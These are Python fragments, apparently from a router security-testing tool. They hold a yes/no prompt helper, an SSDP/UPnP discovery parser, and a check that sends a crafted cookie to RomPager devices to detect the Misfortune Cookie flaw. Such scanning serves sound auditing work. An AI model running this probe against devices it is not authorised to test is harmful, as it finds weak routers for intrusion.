def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True, "no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
print_yellow(question + prompt)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
print_red("Please respond with 'yes' or 'no' "
"(or 'y' or 'n').\n")
def do_run(self, e):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
target = 'http://' + self.host + ":" + self.port + '/blabla'
try:
response = requests.get(target, headers=headers, timeout=60)
if response.status_code != 404:
print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code)
print_red("Device is not running RomPager")
else:
if 'server' in response.headers:
server = response.headers.get('server')
if re.search('RomPager', server) is not None:
print_green("Got RomPager! Server:%s" % server)
if re.search('omg1337hax', response.text) is not None:
print_success("device is vulnerable to misfortune cookie")
else:
print_failed("test didn't pass.")
print_warning("Device MAY still be vulnerable")
else:
print_failed("RomPager not detected, device is running: %s " % server)
else:
print_failed("Not running RomPager")
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def do_run(self, e):
#httplib2.debuglevel = 1
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
target = 'http://' + self.host + ":" + self.port + '/blabla'
h = httplib2.Http(timeout=60)
h.follow_all_redirects = True
try:
response, content = h.request(target, 'GET', headers=headers)
if response.status != 404:
print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status)
print_red("Device is not running RomPager")
else:
if 'server' in response.keys():
server = response.get('server')
if re.search('RomPager', server) is not None:
print_green("Got RomPager! Server:%s" % server)
if re.search('omg1337hax', content.decode()) is not None:
print_success("device is vulnerable to misfortune cookie")
else:
print_failed("test didn't pass.")
print_warning("Device MAY still be vulnerable")
else:
print_failed("RomPager not detected, device is running: %s " % server)
else:
print_failed("Not running RomPager")
except socket.timeout: # Is there a better way of handling timeout in httplib2?
print_error("Timeout!")
def query_yes_no(question, default="yes"):
"""Ask a yes/no question via raw_input() and return their answer.
"question" is a string that is presented to the user.
"default" is the presumed answer if the user just hits <Enter>.
It must be "yes" (the default), "no" or None (meaning
an answer is required of the user).
The "answer" return value is True for "yes" or False for "no".
"""
valid = {"yes": True, "y": True, "ye": True,
"no": False, "n": False}
if default is None:
prompt = " [y/n] "
elif default == "yes":
prompt = " [Y/n] "
elif default == "no":
prompt = " [y/N] "
else:
raise ValueError("invalid default answer: '%s'" % default)
while True:
print_yellow(question + prompt)
choice = input().lower()
if default is not None and choice == '':
return valid[default]
elif choice in valid:
return valid[choice]
else:
print_red("Please respond with 'yes' or 'no' " "(or 'y' or 'n').\n")
def parse_ssdp_info(self, data, show_uniq, verbose):
data = data.decode('utf-8') # When Ctl-C is pressed data is set to False and exception should be raised
host_found = False
# found_location = False
message_type = None
# xml_file = None
# host = False
# page = False
# upnp_type = None
known_headers = {'NOTIFY': 'notification', 'HTTP/1.1 200 OK': 'reply'}
# Use the class defaults if these aren't specified
# if not show_uniq:
# show_uniq = self.uniq
# if not verbose:
# verbose = self.verbose
# Is the SSDP packet a notification, a reply, or neither?
for text, message_type in known_headers.items():
if data.upper().startswith(text):
break
else:
message_type = False
# If this is a notification or a reply message...
if message_type:
# Get the host name and location of its main UPNP XML file
xml_file = self.parse_header(data, "LOCATION")
upnp_type = self.parse_header(data, "SERVER")
(host, page) = self.parse_url(xml_file)
# Sanity check to make sure we got all the info we need
if xml_file is None or host is False or page is False:
print_error("parsing recieved header:")
print_red(data)
return False
# Get the protocol in use (i.e., http, https, etc)
protocol = xml_file.split('://')[0] + '://'
# Check if we've seen this host before; add to the list of hosts if:
# 1. This is a new host
# 2. We've already seen this host, but the uniq hosts setting is disabled
for hostID, hostInfo in self.enum_hosts.items():
if hostInfo['name'] == host:
host_found = True
if self.uniq:
return False
if (host_found and not self.uniq) or not host_found:
# Get the new host's index number and create an entry in ENUM_HOSTS
index = len(self.enum_hosts)
self.enum_hosts[index] = {
'name': host,
'dataComplete': False,
'proto': protocol,
'xml_file': xml_file,
'serverType': None,
'upnpServer': upnp_type,
'deviceList': {}
}
# Be sure to update the command completer so we can tab complete through this host's data structure
# self.updateCmdCompleter(self.ENUM_HOSTS)
# Print out some basic device info
print_info("SSDP " + message_type + " message from " + host)
if xml_file:
# found_location = True
print_info("XML file is located at " + xml_file)
if upnp_type:
print_info("Device is running: " + upnp_type)
return True
